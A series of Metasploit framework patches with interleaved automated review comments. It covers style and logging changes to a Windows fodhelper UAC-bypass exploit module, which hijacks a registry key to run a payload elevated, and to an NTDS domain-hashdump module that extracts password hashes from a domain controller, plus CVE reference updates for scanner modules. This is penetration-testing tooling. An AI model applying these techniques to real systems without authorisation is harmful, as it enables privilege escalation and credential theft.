@@ -997,44 +998,6 @@ module Msf show_module_set("Post", framework.post, regex, minrank, opts) end - def show_options(mod) # :nodoc: - mod_opt = Serializer::ReadableText.dump_options(mod, ' ') - print("\nModule options (#{mod.fullname}):\n\n#{mod_opt}\n") if (mod_opt and mod_opt.length > 0) - - # If it's an exploit and a payload is defined, create it and - # display the payload's options - if (mod.exploit? and mod.datastore['PAYLOAD']) - p = framework.payloads.create(mod.datastore['PAYLOAD']) - - if (!p) - print_error("Invalid payload defined: #{mod.datastore['PAYLOAD']}\n") - return - end - - p.share_datastore(mod.datastore) - - if (p) - p_opt = Serializer::ReadableText.dump_options(p, ' ') - print("\nPayload options (#{mod.datastore['PAYLOAD']}):\n\n#{p_opt}\n") if (p_opt and p_opt.length > 0) - end - end - - # Print the selected target - if (mod.exploit? and mod.target) - mod_targ = Serializer::ReadableText.dump_exploit_target(mod, ' ') - print("\nExploit target:\n\n#{mod_targ}\n") if (mod_targ and mod_targ.length > 0) - end - - # Print the selected action - if mod.kind_of?(Msf::Module::HasActions) && mod.action - mod_action = Serializer::ReadableText.dump_module_action(mod, ' ') - print("\n#{mod.type.capitalize} action:\n\n#{mod_action}\n") if (mod_action and mod_action.length > 0) - end - - # Uncomment this line if u want target like msf2 format - #print("\nTarget: #{mod.target.name}\n\n") - end - def show_missing(mod) # :nodoc: mod_opt = Serializer::ReadableText.dump_options(mod, ' ', true) print("\nModule options (#{mod.fullname}):\n\n#{mod_opt}\n") if (mod_opt and mod_opt.length > 0) From f47cc1a101c98e26603653573768d6eaae7ccafd Mon Sep 17 00:00:00 2001 From: bwatters-r7 Date: Mon, 5 Jun 2017 14:32:45 -0500 Subject: [PATCH 29/38] Rubocop readability changes --- .../windows/local/bypassuac_fodhelper.rb | 113 +++++++++--------- 1 file changed, 57 insertions(+), 56 deletions(-) 
diff --git a/modules/exploits/windows/local/bypassuac_fodhelper.rb b/modules/exploits/windows/local/bypassuac_fodhelper.rb index 8eac5c5949..f14d5fdff1 100644 --- a/modules/exploits/windows/local/bypassuac_fodhelper.rb +++ b/modules/exploits/windows/local/bypassuac_fodhelper.rb 
@@ -14,50 +14,53 @@ class MetasploitModule < Msf::Exploit::Local include Post::Windows::Registry include Post::Windows::Runas - FODHELPER_DEL_KEY = "HKCU\\Software\\Classes\\ms-settings" - FODHELPER_WRITE_KEY = "HKCU\\Software\\Classes\\ms-settings\\shell\\open\\command" - EXEC_REG_DELEGATE_VAL = 'DelegateExecute' - EXEC_REG_VAL = '' # This maps to "(Default)" - EXEC_REG_VAL_TYPE = 'REG_SZ' - FODHELPER_PATH = "%WINDIR%\\System32\\fodhelper.exe" - CMD_MAX_LEN = 16383 + FODHELPER_DEL_KEY = "HKCU\\Software\\Classes\\ms-settings".freeze + FODHELPER_WRITE_KEY = "HKCU\\Software\\Classes\\ms-settings\\shell\\open\\command".freeze + EXEC_REG_DELEGATE_VAL = 'DelegateExecute'.freeze + EXEC_REG_VAL = ''.freeze # This maps to "(Default)" + EXEC_REG_VAL_TYPE = 'REG_SZ'.freeze + FODHELPER_PATH = "%WINDIR%\\System32\\fodhelper.exe".freeze + CMD_MAX_LEN = 16383 - def initialize(info={}) - super(update_info(info, - 'Name' => 'Windows UAC Protection Bypass (Via FodHelper Registry Key)', - 'Description' => %q{ - This module will bypass Windows 10 UAC by hijacking a special key in the Registry under - the current user hive, and inserting a custom command that will get invoked when - the Windows fodhelper.exe application is launched. It will spawn a second shell that has the UAC - flag turned off. + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'Windows UAC Protection Bypass (Via FodHelper Registry Key)', + 'Description' => %q{ + This module will bypass Windows 10 UAC by hijacking a special key in the Registry under + the current user hive, and inserting a custom command that will get invoked when + the Windows fodhelper.exe application is launched. It will spawn a second shell that has the UAC + flag turned off. - This module modifies a registry key, but cleans up the key once the payload has - been invoked. + This module modifies a registry key, but cleans up the key once the payload has + been invoked. 
- The module does not require the architecture of the payload to match the OS. If - specifying EXE::Custom your DLL should call ExitProcess() after starting your - payload in a separate process. - }, - 'License' => MSF_LICENSE, - 'Author' => [ - 'winscriptingblog', # UAC bypass discovery and research - 'amaloteaux' , # MSF module + The module does not require the architecture of the payload to match the OS. If + specifying EXE::Custom your DLL should call ExitProcess() after starting your + payload in a separate process. + }, + 'License' => MSF_LICENSE, + 'Author' => [ + 'winscriptingblog', # UAC bypass discovery and research + 'amaloteaux', # MSF module ], - 'Platform' => ['win'], - 'SessionTypes' => ['meterpreter'], - 'Targets' => [ + 'Platform' => ['win'], + 'SessionTypes' => ['meterpreter'], + 'Targets' => [ [ 'Windows x86', { 'Arch' => ARCH_X86 } ], [ 'Windows x64', { 'Arch' => ARCH_X64 } ] - ], - 'DefaultTarget' => 0, - 'References' => [ - [ - 'URL', 'https://winscripting.blog/2017/05/12/first-entry-welcome-and-uac-bypass/', - 'URL', 'https://github.com/winscripting/UAC-bypass/blob/master/FodhelperBypass.ps1' - ] - ], - 'DisclosureDate'=> 'May 12 2017' - )) + ], + 'DefaultTarget' => 0, + 'References' => [ + [ + 'URL', 'https://winscripting.blog/2017/05/12/first-entry-welcome-and-uac-bypass/', + 'URL', 'https://github.com/winscripting/UAC-bypass/blob/master/FodhelperBypass.ps1' + ] + ], + 'DisclosureDate' => 'May 12 2017' + ) + ) end def check @@ -71,7 +74,7 @@ class MetasploitModule < Msf::Exploit::Local def exploit commspec = '%COMSPEC%' registry_view = REGISTRY_VIEW_NATIVE - psh_path = "%WINDIR%\\System32\\WindowsPowershell\\v1.0\\powershell.exe" + psh_path = "%WINDIR%\\System32\\WindowsPowershell\\v1.0\\powershell.exe" # Make sure we have a sane payload configuration if sysinfo['Architecture'] == ARCH_X64 
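Review bot: `'References'` is still a single four-element array — `[ 'URL', …, 'URL', … ]` inside the outer list — rather than one `['URL', …]` pair per reference; the rubocop pass reindented these lines but kept the shape, so the second URL is most likely dropped when the reference list is built. It should be `[ 'URL', 'https://winscripting.blog/2017/05/12/first-entry-welcome-and-uac-bypass/' ],` followed by `[ 'URL', 'https://github.com/winscripting/UAC-bypass/blob/master/FodhelperBypass.ps1' ]`. `initialize` spans the whole hunk; the class header and `check` body are outside it.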
@@ -95,7 +98,7 @@ class MetasploitModule < Msf::Exploit::Local end end - if !payload.arch.empty? && !(payload.arch.first == target_arch.first) + if !payload.arch.empty? && (payload.arch.first != target_arch.first) fail_with(Failure::BadConfig, 'payload and target should use the same architecture') end @@ -104,19 +107,18 @@ class MetasploitModule < Msf::Exploit::Local check_permissions! case get_uac_level - when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP, - UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP, - UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT - fail_with(Failure::NotVulnerable, - "UAC is set to 'Always Notify'. This module does not bypass this setting, exiting..." - ) - when UAC_DEFAULT - print_good('UAC is set to Default') - print_good('BypassUAC can bypass this setting, continuing...') - when UAC_NO_PROMPT - print_warning('UAC set to DoNotPrompt - using ShellExecute "runas" method instead') - shell_execute_exe - return + when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP, + UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP, + UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT + fail_with(Failure::NotVulnerable, + "UAC is set to 'Always Notify'. This module does not bypass this setting, exiting...") + when UAC_DEFAULT + print_good('UAC is set to Default') + print_good('BypassUAC can bypass this setting, continuing...') + when UAC_NO_PROMPT + print_warning('UAC set to DoNotPrompt - using ShellExecute "runas" method instead') + shell_execute_exe + return end payload_value = rand_text_alpha(8) @@ -145,7 +147,7 @@ class MetasploitModule < Msf::Exploit::Local end registry_setvaldata(FODHELPER_WRITE_KEY, EXEC_REG_VAL, cmd, EXEC_REG_VAL_TYPE, registry_view) - registry_setvaldata(FODHELPER_WRITE_KEY, payload_value,psh_payload, EXEC_REG_VAL_TYPE, registry_view) + registry_setvaldata(FODHELPER_WRITE_KEY, payload_value, psh_payload, EXEC_REG_VAL_TYPE, registry_view) # Calling fodhelper.exe through cmd.exe allow us to launch it from either x86 or x64 session arch. cmd_path = expand_path(commspec) 
@@ -153,7 +155,7 @@ class MetasploitModule < Msf::Exploit::Local
 print_status("Executing payload: #{cmd_path} #{cmd_args}")
 # We can't use cmd_exec here because it blocks, waiting for a result.
- client.sys.process.execute(cmd_path, cmd_args, {'Hidden' => true})
+ client.sys.process.execute(cmd_path, cmd_args, { 'Hidden' => true })
 # Wait a copule of seconds to give the payload a chance to fire before cleaning up
 # TODO: fix this up to use something smarter than a timeout?
@@ -171,7 +173,6 @@ class MetasploitModule < Msf::Exploit::Local
 registry_setvaldata(FODHELPER_WRITE_KEY, EXEC_REG_VAL, existing, EXEC_REG_VAL_TYPE, registry_view)
 end
 registry_deleteval(FODHELPER_WRITE_KEY, payload_value, registry_view)
-
 end
 def check_permissions!
From 42aa2e5acf9ac3cb86c8ccd16c5d5374749bf2ca Mon Sep 17 00:00:00 2001
From: David Maloney
Date: Mon, 5 Jun 2017 15:21:50 -0500
Subject: [PATCH 30/38] add some attempts at debugging to ntds
add some logging and more status outputs to the NTDS domain hasdump. Also force the encoding on strings to UTF8
---
 lib/metasploit/framework/ntds/account.rb | 2 +-
 lib/metasploit/framework/ntds/parser.rb | 4 +++-
 modules/post/windows/gather/credentials/domain_hashdump.rb | 4 ++++
 3 files changed, 8 insertions(+), 2 deletions(-)
diff --git a/lib/metasploit/framework/ntds/account.rb b/lib/metasploit/framework/ntds/account.rb
index af2ecfcb77..62067abb0e 100644
--- a/lib/metasploit/framework/ntds/account.rb
+++ b/lib/metasploit/framework/ntds/account.rb
@@ -137,7 +137,7 @@ module Metasploit
 end
 def get_string(data,length)
- data.slice!(0,length).gsub(/\x00/,'')
+ data.slice!(0,length).force_encoding("UTF-8").gsub(/\x00/,'')
 end
 def uac_string
diff --git a/lib/metasploit/framework/ntds/parser.rb b/lib/metasploit/framework/ntds/parser.rb
index 7c4d91890c..0ea69821cc 100644
--- a/lib/metasploit/framework/ntds/parser.rb
+++ b/lib/metasploit/framework/ntds/parser.rb
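Review bot: `force_encoding("UTF-8")` in `get_string` only relabels the bytes; if the slice is not valid UTF-8, the `gsub` that follows raises `ArgumentError` ("invalid byte sequence in UTF-8") where the previous binary-string code simply stripped the NULs, so one malformed record can now abort the whole dump. `data.slice!(0,length).force_encoding("UTF-8").scrub.gsub(/\x00/,'')` keeps the relabel without the crash. If the field is really stored as UTF-16LE (worth confirming against the caller, which is outside the hunk), it should be labelled as such and converted with `encode('UTF-8')` rather than force-labelled, otherwise the NUL stripping is also removing half of every code unit. `get_string` is fully inside the hunk.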
@@ -50,11 +50,13 @@ module Metasploit def pull_batch if channel.cid.nil? + dlog("NTDS Parser Channel was closed, reopening") reopen_channel end begin raw_batch_data = channel.read(BATCH_SIZE) - rescue EOFError + rescue EOFError => e + elog("NTDS Parser: Error pulling batch - #{e}") raw_batch_data = nil end raw_batch_data diff --git a/modules/post/windows/gather/credentials/domain_hashdump.rb b/modules/post/windows/gather/credentials/domain_hashdump.rb index 44e9001cde..ec0ee1332e 100644 --- a/modules/post/windows/gather/credentials/domain_hashdump.rb +++ b/modules/post/windows/gather/credentials/domain_hashdump.rb @@ -33,10 +33,13 @@ class MetasploitModule < Msf::Post if preconditions_met? ntds_file = copy_database_file unless ntds_file.nil? + file_stat = client.fs.file.stat(ntds_file) + print_status "NTDS File Size: #{file_stat.size.to_s} bytes" print_status "Repairing NTDS database after copy..." print_status repair_ntds(ntds_file) realm = sysinfo["Domain"] ntds_parser = Metasploit::Framework::NTDS::Parser.new(client, ntds_file) + print_status "Started up NTDS channel. Preparing to stream results..." ntds_parser.each_account do |ad_account| print_good ad_account.to_s report_hash(ad_account.ntlm_hash.downcase, ad_account.name, realm) @@ -46,6 +49,7 @@ class MetasploitModule < Msf::Post report_hash(hash_string.downcase,ad_account.name, realm) end end + print_status "Deleting backup of NTDS.dit at #{ntds_file}" rm_f(ntds_file) end end From 1558db375d89a8e1d973483923948d4b36c8bbc1 Mon Sep 17 00:00:00 2001 
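Review bot: The new `elog` in pull_batch logs at error level what appears to be the normal end-of-stream condition: the rescue sets `raw_batch_data = nil`, which reads as the terminating value the caller checks for, so every successful dump would leave an "Error pulling batch" line in framework.log. If EOFError is how the channel signals completion, `dlog("NTDS Parser: channel EOF - #{e}")` is the appropriate level and wording, and `elog` should be reserved for exceptions that are genuinely unexpected. The caller of pull_batch is outside this hunk, so nil-as-termination is inferred from the rescue, not confirmed.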
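Review bot: The added `client.fs.file.stat(ntds_file)` is a purely informational call, yet if it raises (a Meterpreter `RequestError` on a missing or locked file) the module aborts before ever reaching `rm_f(ntds_file)`, leaving the copied NTDS.dit on the domain controller; nothing visible suggests that cleanup sits in an `ensure`. A status line should not be able to change the cleanup outcome, so make the size report best-effort, and drop the redundant `.to_s` inside the interpolation while there. The enclosing `preconditions_met?` block starts and ends outside this hunk, so whether rm_f is otherwise protected is inferred.
```ruby
unless ntds_file.nil?
  begin
    print_status "NTDS File Size: #{client.fs.file.stat(ntds_file).size} bytes"
  rescue ::Rex::Post::Meterpreter::RequestError => e
    print_warning "Could not stat #{ntds_file}: #{e.message}"
  end
  print_status "Repairing NTDS database after copy..."
  # … unchanged: repair_ntds, parser setup, each_account reporting, rm_f cleanup …
```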
From: Jeffrey Martin Date: Mon, 5 Jun 2017 16:25:02 -0500 Subject: [PATCH 31/38] update CVE reference in where modules report_vuln --- modules/auxiliary/scanner/dns/dns_amp.rb | 9 +++++++-- modules/auxiliary/scanner/http/host_header_injection.rb | 1 + modules/auxiliary/scanner/http/jenkins_command.rb | 2 ++ modules/auxiliary/scanner/http/trace.rb | 7 ++++++- modules/auxiliary/scanner/ipmi/ipmi_cipher_zero.rb | 1 + .../auxiliary/scanner/misc/sercomm_backdoor_scanner.rb | 1 + modules/auxiliary/scanner/ntp/ntp_peer_list_dos.rb | 1 + modules/auxiliary/scanner/ntp/ntp_peer_list_sum_dos.rb | 1 + modules/auxiliary/scanner/ntp/ntp_readvar.rb | 1 + modules/auxiliary/scanner/ntp/ntp_req_nonce_dos.rb | 1 + modules/auxiliary/scanner/ntp/ntp_reslist_dos.rb | 1 + modules/auxiliary/scanner/ntp/ntp_unsettrap_dos.rb | 1 + modules/auxiliary/scanner/oracle/tnspoison_checker.rb | 1 + modules/auxiliary/scanner/portmap/portmap_amp.rb | 1 + modules/auxiliary/scanner/scada/moxa_discover.rb | 1 + modules/auxiliary/scanner/udp/udp_amplification.rb | 1 + modules/auxiliary/scanner/udp_scanner_template.rb | 7 ++++++- modules/auxiliary/scanner/upnp/ssdp_amp.rb | 1 + modules/auxiliary/scanner/upnp/ssdp_msearch.rb | 9 ++++++++- modules/auxiliary/scanner/vnc/vnc_none_auth.rb | 1 + .../unix/webapp/actualanalyzer_ant_cookie_exec.rb | 1 + 21 files changed, 45 insertions(+), 5 deletions(-) diff --git a/modules/auxiliary/scanner/dns/dns_amp.rb b/modules/auxiliary/scanner/dns/dns_amp.rb index b66783c091..39d7144a11 100644 --- a/modules/auxiliary/scanner/dns/dns_amp.rb +++ b/modules/auxiliary/scanner/dns/dns_amp.rb @@ -19,7 +19,12 @@ class MetasploitModule < Msf::Auxiliary third party. }, 'Author' => [ 'xistence '], # Original scanner module - 'License' => MSF_LICENSE + 'License' => MSF_LICENSE, + 'References' => + [ + ['CVE', '2006-0987'], + ['CVE', '2006-0988'], + ] ) register_options( [ 
@@ -124,7 +129,7 @@ class MetasploitModule < Msf::Auxiliary :port => datastore['RPORT'], :proto => 'udp', :name => "DNS", :info => "DNS amplification - #{data.length} bytes [#{amp.round(2)}x Amplification]", - :refs => [ "CVE-2006-0987", "CVE-2006-0988" ]) + :refs => self.references) end # If these flags are set, we get a valid response but recursion is not available diff --git a/modules/auxiliary/scanner/http/host_header_injection.rb b/modules/auxiliary/scanner/http/host_header_injection.rb index f7e0dc5788..4f29c3e1d2 100644 --- a/modules/auxiliary/scanner/http/host_header_injection.rb +++ b/modules/auxiliary/scanner/http/host_header_injection.rb @@ -21,6 +21,7 @@ class MetasploitModule < Msf::Auxiliary 'License' => MSF_LICENSE, 'References' => [ + ['CVE', 'CVE-2016-10073'], # validate, an instance of a described attack approach from the original reference ['URL', 'http://www.skeletonscribe.net/2013/05/practical-http-host-header-attacks.html'] ] )) diff --git a/modules/auxiliary/scanner/http/jenkins_command.rb b/modules/auxiliary/scanner/http/jenkins_command.rb index 4280549ba9..3c7dde16e2 100644 --- a/modules/auxiliary/scanner/http/jenkins_command.rb +++ b/modules/auxiliary/scanner/http/jenkins_command.rb @@ -26,6 +26,8 @@ class MetasploitModule < Msf::Auxiliary ], 'References' => [ + ['CVE', '2015-8103'], # see link and validate, https://highon.coffee/blog/jenkins-api-unauthenticated-rce-exploit/ states this is another issue + ['URL', 'https://jenkins.io/security/advisory/2015-11-11/'], ['URL', 'https://www.pentestgeek.com/penetration-testing/hacking-jenkins-servers-with-no-password/'], ['URL', 'https://wiki.jenkins-ci.org/display/JENKINS/Jenkins+Script+Console'], ], diff --git a/modules/auxiliary/scanner/http/trace.rb b/modules/auxiliary/scanner/http/trace.rb index 79c2e065b2..66cb7403e2 100644 --- a/modules/auxiliary/scanner/http/trace.rb +++ b/modules/auxiliary/scanner/http/trace.rb 
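Review bot: The `['CVE', '2015-8103']` line added to jenkins_command.rb is committed together with an inline "see link and validate" note, i.e. the author is not sure it applies, and to my knowledge the 2015-11-11 advisory linked beside it describes the CLI deserialization issue rather than the script-console access this module exercises. If this module reports its References via report_vuln, as the commit title implies, an unverified identifier becomes an established finding on every host, which is worse than no identifier at all. Keep the `['URL', 'https://jenkins.io/security/advisory/2015-11-11/']` line, drop the CVE until someone confirms the mapping, and do not ship "validate" reminders in module metadata; the same applies to the `# validate` note on CVE-2016-10073 in the host_header_injection.rb hunk above.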
@@ -20,7 +20,12 @@ class MetasploitModule < Msf::Auxiliary 'Jay Turla <@shipcod3>' , #Cross-Site Tracing (XST) Checker 'CG' #HTTP TRACE Detection ], - 'License' => MSF_LICENSE + 'License' => MSF_LICENSE, + 'References' => + [ + ['CVE', '2005-3398'], # early case where this vector applied to a specific application. + ['URL', 'https://www.owasp.org/index.php/Cross_Site_Tracing'] + ] ) end diff --git a/modules/auxiliary/scanner/ipmi/ipmi_cipher_zero.rb b/modules/auxiliary/scanner/ipmi/ipmi_cipher_zero.rb index 2afafdf68b..993a4c8db0 100644 --- a/modules/auxiliary/scanner/ipmi/ipmi_cipher_zero.rb +++ b/modules/auxiliary/scanner/ipmi/ipmi_cipher_zero.rb @@ -23,6 +23,7 @@ class MetasploitModule < Msf::Auxiliary 'License' => MSF_LICENSE, 'References' => [ + ['CVE', '2013-4782'], ['URL', 'http://fish2.com/ipmi/cipherzero.html'], ['OSVDB', '93038'], ['OSVDB', '93039'], diff --git a/modules/auxiliary/scanner/misc/sercomm_backdoor_scanner.rb b/modules/auxiliary/scanner/misc/sercomm_backdoor_scanner.rb index 8ab1f22b2a..e423f88aae 100644 --- a/modules/auxiliary/scanner/misc/sercomm_backdoor_scanner.rb +++ b/modules/auxiliary/scanner/misc/sercomm_backdoor_scanner.rb @@ -24,6 +24,7 @@ class MetasploitModule < Msf::Auxiliary 'License' => MSF_LICENSE, 'References' => [ + [ 'CVE', '2014-0659' ], [ 'OSVDB', '101653' ], [ 'URL', 'https://github.com/elvanderb/TCP-32764' ] ], diff --git a/modules/auxiliary/scanner/ntp/ntp_peer_list_dos.rb b/modules/auxiliary/scanner/ntp/ntp_peer_list_dos.rb index 2c12582f45..cb35d9d223 100644 --- a/modules/auxiliary/scanner/ntp/ntp_peer_list_dos.rb +++ b/modules/auxiliary/scanner/ntp/ntp_peer_list_dos.rb @@ -24,6 +24,7 @@ class MetasploitModule < Msf::Auxiliary 'Author' => 'Jon Hart ', 'References' => [ + ['CVE', '2013-5211'], # see also scanner/ntp/ntp_monlist.rb ['URL', 'https://github.com/rapid7/metasploit-framework/pull/3696'], ['URL', 'http://r-7.co/R7-2014-12'] ], 
diff --git a/modules/auxiliary/scanner/ntp/ntp_peer_list_sum_dos.rb b/modules/auxiliary/scanner/ntp/ntp_peer_list_sum_dos.rb index 1b112322bf..bf44690300 100644 --- a/modules/auxiliary/scanner/ntp/ntp_peer_list_sum_dos.rb +++ b/modules/auxiliary/scanner/ntp/ntp_peer_list_sum_dos.rb @@ -24,6 +24,7 @@ class MetasploitModule < Msf::Auxiliary 'Author' => 'Jon Hart ', 'References' => [ + ['CVE', '2013-5211'], # see also scanner/ntp/ntp_monlist.rb ['URL', 'https://github.com/rapid7/metasploit-framework/pull/3696'], ['URL', 'http://r-7.co/R7-2014-12'] ], diff --git a/modules/auxiliary/scanner/ntp/ntp_readvar.rb b/modules/auxiliary/scanner/ntp/ntp_readvar.rb index 79da60051c..0dab772289 100644 --- a/modules/auxiliary/scanner/ntp/ntp_readvar.rb +++ b/modules/auxiliary/scanner/ntp/ntp_readvar.rb @@ -26,6 +26,7 @@ class MetasploitModule < Msf::Auxiliary 'License' => MSF_LICENSE, 'References' => [ + ['CVE', '2013-5211'], # see also scanner/ntp/ntp_monlist.rb [ 'URL', 'http://www.rapid7.com/vulndb/lookup/ntp-clock-variables-disclosure' ] ] ) diff --git a/modules/auxiliary/scanner/ntp/ntp_req_nonce_dos.rb b/modules/auxiliary/scanner/ntp/ntp_req_nonce_dos.rb index 6b3ac8eb6d..a4a0642a13 100644 --- a/modules/auxiliary/scanner/ntp/ntp_req_nonce_dos.rb +++ b/modules/auxiliary/scanner/ntp/ntp_req_nonce_dos.rb @@ -25,6 +25,7 @@ class MetasploitModule < Msf::Auxiliary 'Author' => 'Jon Hart ', 'References' => [ + ['CVE', '2013-5211'], # see also scanner/ntp/ntp_monlist.rb ['URL', 'https://github.com/rapid7/metasploit-framework/pull/3696'], ['URL', 'http://r-7.co/R7-2014-12'] ], diff --git a/modules/auxiliary/scanner/ntp/ntp_reslist_dos.rb b/modules/auxiliary/scanner/ntp/ntp_reslist_dos.rb index ac5c08ae60..5f6e42cfb5 100644 --- a/modules/auxiliary/scanner/ntp/ntp_reslist_dos.rb +++ b/modules/auxiliary/scanner/ntp/ntp_reslist_dos.rb 
@@ -26,6 +26,7 @@ class MetasploitModule < Msf::Auxiliary 'Author' => 'Jon Hart ', 'References' => [ + ['CVE', '2013-5211'], # see also scanner/ntp/ntp_monlist.rb ['URL', 'https://github.com/rapid7/metasploit-framework/pull/3696'], ['URL', 'http://r-7.co/R7-2014-12'] ], diff --git a/modules/auxiliary/scanner/ntp/ntp_unsettrap_dos.rb b/modules/auxiliary/scanner/ntp/ntp_unsettrap_dos.rb index 3176bd8e2b..57b7c78a59 100644 --- a/modules/auxiliary/scanner/ntp/ntp_unsettrap_dos.rb +++ b/modules/auxiliary/scanner/ntp/ntp_unsettrap_dos.rb @@ -24,6 +24,7 @@ class MetasploitModule < Msf::Auxiliary 'Author' => 'Jon Hart ', 'References' => [ + ['CVE', '2013-5211'], # see also scanner/ntp/ntp_monlist.rb ['URL', 'https://github.com/rapid7/metasploit-framework/pull/3696'], ['URL', 'http://r-7.co/R7-2014-12'] ], diff --git a/modules/auxiliary/scanner/oracle/tnspoison_checker.rb b/modules/auxiliary/scanner/oracle/tnspoison_checker.rb index 956a9893ec..a1518d54fb 100644 --- a/modules/auxiliary/scanner/oracle/tnspoison_checker.rb +++ b/modules/auxiliary/scanner/oracle/tnspoison_checker.rb @@ -21,6 +21,7 @@ class MetasploitModule < Msf::Auxiliary 'Author' => ['ir0njaw (Nikita Kelesis) '], # of Digital Security [http://dsec.ru] 'References' => [ + [ 'CVE', '2012-1675'], [ 'URL', 'http://seclists.org/fulldisclosure/2012/Apr/204' ], ], 'DisclosureDate' => 'Apr 18 2012', diff --git a/modules/auxiliary/scanner/portmap/portmap_amp.rb b/modules/auxiliary/scanner/portmap/portmap_amp.rb index 53ecf1472c..7fac7f9d89 100644 --- a/modules/auxiliary/scanner/portmap/portmap_amp.rb +++ b/modules/auxiliary/scanner/portmap/portmap_amp.rb @@ -20,6 +20,7 @@ class MetasploitModule < Msf::Auxiliary 'License' => MSF_LICENSE, 'References' => [ + ['CVE', '2013-5211'], # see also scanner/ntp/ntp_monlist.rb ['URL', 'https://www.us-cert.gov/ncas/alerts/TA14-017A'], ['URL', 'http://blog.level3.com/security/a-new-ddos-reflection-attack-portmapper-an-early-warning-to-the-industry/'] ], 
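Review bot: CVE-2013-5211 is, as far as I know, the ntpd `monlist` amplification issue, and the `# see also scanner/ntp/ntp_monlist.rb` comment itself shows it was copied from there; attaching it to portmap_amp.rb, and likewise to udp_amplification.rb and ssdp_amp.rb in the hunks that follow, labels Portmapper and SSDP reflectors as an NTP vulnerability in any report_vuln output built from References. Drop the CVE line in these three modules and keep the CERT and vendor URLs already listed, which are the advisories that actually describe those services. If a structured identifier is wanted, it should be one issued for the protocol in question, not borrowed from a neighbouring module.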
diff --git a/modules/auxiliary/scanner/scada/moxa_discover.rb b/modules/auxiliary/scanner/scada/moxa_discover.rb index 98d999bd2c..e4ed17dfd1 100644 --- a/modules/auxiliary/scanner/scada/moxa_discover.rb +++ b/modules/auxiliary/scanner/scada/moxa_discover.rb @@ -35,6 +35,7 @@ class MetasploitModule < Msf::Auxiliary 'License' => MSF_LICENSE, 'References' => [ + [ 'CVE', '2016-9361'], [ 'URL', 'https://www.digitalbond.com/blog/2016/10/25/serial-killers/'], [ 'URL', 'http://www.moxa.com/support/faq/faq_detail.aspx?id=646' ], ] diff --git a/modules/auxiliary/scanner/udp/udp_amplification.rb b/modules/auxiliary/scanner/udp/udp_amplification.rb index 8daa328212..468c109dfb 100644 --- a/modules/auxiliary/scanner/udp/udp_amplification.rb +++ b/modules/auxiliary/scanner/udp/udp_amplification.rb @@ -16,6 +16,7 @@ class MetasploitModule < Msf::Auxiliary 'License' => MSF_LICENSE, 'References' => [ + ['CVE', '2013-5211'], # see also scanner/ntp/ntp_monlist.rb ['URL', 'https://www.us-cert.gov/ncas/alerts/TA14-017A'] ] ) diff --git a/modules/auxiliary/scanner/udp_scanner_template.rb b/modules/auxiliary/scanner/udp_scanner_template.rb index d05c8fd5b9..f1f8267f15 100644 --- a/modules/auxiliary/scanner/udp_scanner_template.rb +++ b/modules/auxiliary/scanner/udp_scanner_template.rb @@ -21,7 +21,12 @@ class MetasploitModule < Msf::Auxiliary ), 'Author' => 'Joe Contributor ', 'DisclosureDate' => 'Mar 15 2014', - 'License' => MSF_LICENSE + 'License' => MSF_LICENSE, + 'References' => + [ + ['CVE', '0000-0000'], # remove or update if CVE exists + ['URL', 'https://SomeURLinCyberspace.local'] + ] ) ) diff --git a/modules/auxiliary/scanner/upnp/ssdp_amp.rb b/modules/auxiliary/scanner/upnp/ssdp_amp.rb index df1ca06fc8..f67a49a794 100644 --- a/modules/auxiliary/scanner/upnp/ssdp_amp.rb +++ b/modules/auxiliary/scanner/upnp/ssdp_amp.rb 
@@ -17,6 +17,7 @@ class MetasploitModule < Msf::Auxiliary 'License' => MSF_LICENSE, 'References' => [ + ['CVE', '2013-5211'], # see also scanner/ntp/ntp_monlist.rb ['URL', 'https://www.us-cert.gov/ncas/alerts/TA14-017A'] ], ) diff --git a/modules/auxiliary/scanner/upnp/ssdp_msearch.rb b/modules/auxiliary/scanner/upnp/ssdp_msearch.rb index a3e0f273c7..cbb209251e 100644 --- a/modules/auxiliary/scanner/upnp/ssdp_msearch.rb +++ b/modules/auxiliary/scanner/upnp/ssdp_msearch.rb @@ -13,7 +13,14 @@ class MetasploitModule < Msf::Auxiliary 'Name' => 'UPnP SSDP M-SEARCH Information Discovery', 'Description' => 'Discover information from UPnP-enabled systems', 'Author' => [ 'todb', 'hdm'], # Original scanner module and vuln info reporter, respectively - 'License' => MSF_LICENSE + 'License' => MSF_LICENSE, + 'References' => + [ + ['CVE', '2012-5958'], + ['CVE', '2012-5959'], + ['CVE', '2013-0230'], + ['CVE', '2013-0229'] + ] ) register_options( [ diff --git a/modules/auxiliary/scanner/vnc/vnc_none_auth.rb b/modules/auxiliary/scanner/vnc/vnc_none_auth.rb index bbce7b8e45..d91d18e1d3 100644 --- a/modules/auxiliary/scanner/vnc/vnc_none_auth.rb +++ b/modules/auxiliary/scanner/vnc/vnc_none_auth.rb @@ -17,6 +17,7 @@ class MetasploitModule < Msf::Auxiliary 'Description' => 'Detect VNC servers that support the "None" authentication method.', 'References' => [ + ['CVE', '2006-2369'], # a related instance where "None" could be offered and used when not configured as allowed. ['URL', 'http://en.wikipedia.org/wiki/RFB'], ['URL', 'http://en.wikipedia.org/wiki/Vnc'], ], diff --git a/modules/exploits/unix/webapp/actualanalyzer_ant_cookie_exec.rb b/modules/exploits/unix/webapp/actualanalyzer_ant_cookie_exec.rb index c07127bfb3..f921e16d75 100644 --- a/modules/exploits/unix/webapp/actualanalyzer_ant_cookie_exec.rb +++ b/modules/exploits/unix/webapp/actualanalyzer_ant_cookie_exec.rb 
